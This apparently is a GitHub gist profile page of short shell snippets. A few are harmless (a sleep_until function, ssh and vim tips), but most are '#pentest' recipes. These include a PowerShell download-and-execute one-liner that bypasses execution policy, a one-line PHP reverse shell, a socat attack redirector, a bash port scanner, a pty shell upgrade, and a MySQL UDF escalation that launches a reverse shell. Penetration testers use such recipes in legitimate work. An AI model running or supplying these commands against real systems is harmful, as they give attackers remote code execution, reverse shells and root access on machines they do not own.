Skip to content

Instantly share code, notes, and snippets.

View p0c's full-sized avatar

p0c

8 followers · 5 following
View GitHub Profile
@p0c
p0c / sleep_until.sh
Last active February 2, 2016 18:49
shell function sleep until
sleep_until() {
current_time=$(date +%s)
target_time=$(date -d "$*" +%s)
seconds=$(( $target_time - $current_time ))
sleep $seconds
}
# Usage:
# sleep_until tomorrow 11:50
# sleep_until 24 hours
@p0c
p0c / download_exec_bypass_execp
Created February 16, 2015 09:40
download and exec bypassing powershell execution policy
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://your_host/your_script.ps1')"
@p0c
p0c / socat_redirect
Created October 3, 2014 08:55
#pentest #recipe: socat port redirector
# socat tcp port redirector, useful for cloud based redirectors (distributed attack network simulation)
socat TCP-LISTEN:80,fork TCP:10.10.0.1:80
@p0c
p0c / script_strip
Created June 26, 2014 11:16
#pentest #recipe: clean escape sequence codes from 'script' log
#!/bin/bash
#-----------------------------------------------------------------------------
# Preconditions:
#
# You have a `script` command outputfile (typescript by default)
#
# $ script
# Script started, file is typescript
# <-- your commands and output here -->
@p0c
p0c / php_small_reverseshell
Created February 17, 2014 09:49
#pentest #recipe: small php reverse shell
# fd for tcp could change (in this case == 3)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
# command line version
php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");'
@p0c
p0c / speed_up_ssh-Y
Created February 11, 2014 10:21
speed up ssh x-forward
ssh -YC4c arcfour,blowfish-cbc user@host
@p0c
p0c / bash_portscanner
Created February 4, 2014 19:52
#pentest #recipe: bash commandline portscanner
HOST=192.168.100.254;for((port=1;port<=65535;++port));do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
@p0c
p0c / upgrade_to_proper_shell
Created February 4, 2014 10:51
#pentest #recipe: upgrade to proper shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
@p0c
p0c / mysql_root_to_system_root
Last active August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
@p0c
p0c / vim-ignore-esc-seq
Created January 8, 2014 16:03
Ignore escape sequences in VIM: Useful for editing / viewing script command output
Use AnsiEsc.vim (https://github.com/vim-scripts/AnsiEsc.vim)
When editing a file with escape sequences (for example output of script command) --> :AnsiEsc